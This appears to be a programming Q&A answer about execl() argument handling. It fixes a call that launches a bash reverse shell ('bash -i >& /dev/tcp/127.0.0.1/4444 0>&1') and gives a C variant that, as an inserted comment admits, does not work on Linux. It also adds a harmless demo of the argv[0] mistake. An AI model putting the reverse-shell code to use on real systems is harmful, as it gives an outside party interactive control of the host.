The first argument to `execl()` is the pathname of the executable. The second argument is `argv[0]`. You are telling bash that its name is "/bin/bash -i >&…", and since there are no other arguments, it runs as a regular interactive shell connected to the standard I/O channels of the process your code is in.
You need:
```c
execl("/bin/bash", "/bin/bash", "-c", "/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1", (char *)0);
```
This effectively invokes:
```
/bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
```
You need the extra level of shell to make the shell handle the I/O redirection. You could do it yourself and save a shell invocation.
```c
#include <fcntl.h>
#include <unistd.h>

/* Note: "/dev/tcp/host/port" is a path that bash itself interprets in
 * redirections; the Linux kernel exposes no such file, so open(2) on it
 * fails there. The call is kept as the answer posted it. */
int fd = open("/dev/tcp/127.0.0.1/4444", O_RDWR);
if (fd < 0)
    return 1;              /* nothing to redirect to */
dup2(fd, STDIN_FILENO);    /* point stdin, stdout and stderr at fd */
dup2(fd, STDOUT_FILENO);
dup2(fd, STDERR_FILENO);
close(fd);                 /* the three dup'd descriptors keep it open */
execl("/bin/bash", "/bin/bash", "-i", (char *)0);
```
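To see the `argv[0]` mistake from the top of this answer in isolation, here is an added example (not part of the original answer) that runs `/bin/sh` both ways with a harmless command, `exit 7`, and compares the exit status; `run_sh`, `wrong_call` and `right_call` are names chosen for this example, and stdin is redirected from `/dev/null` so the mistakenly interactive shell exits at EOF instead of waiting on a terminal.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>

/* Fork, exec /bin/sh with the given execl-style argument list (stdin from
 * /dev/null), and return the child's exit status, or -1 on failure. */
static int run_sh(const char *argv0, const char *arg1, const char *arg2)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int devnull = open("/dev/null", O_RDONLY);
        if (devnull >= 0) {
            dup2(devnull, STDIN_FILENO);
            close(devnull);
        }
        /* execl stops at the first NULL, so trailing NULLs are harmless */
        execl("/bin/sh", argv0, arg1, arg2, (char *)0);
        _exit(127); /* only reached if execl fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Wrong: the whole command line lands in argv[0]. sh sees no "-c", reads
 * commands from stdin (EOF here) and exits 0; "exit 7" never runs. */
int wrong_call(void)
{
    return run_sh("/bin/sh -c 'exit 7'", (char *)0, (char *)0);
}

/* Right: "-c" and the command string are separate argv entries. */
int right_call(void)
{
    return run_sh("/bin/sh", "-c", "exit 7");
}

int main(void)
{
    printf("wrong: %d, right: %d\n", wrong_call(), right_call());
    return 0;
}
```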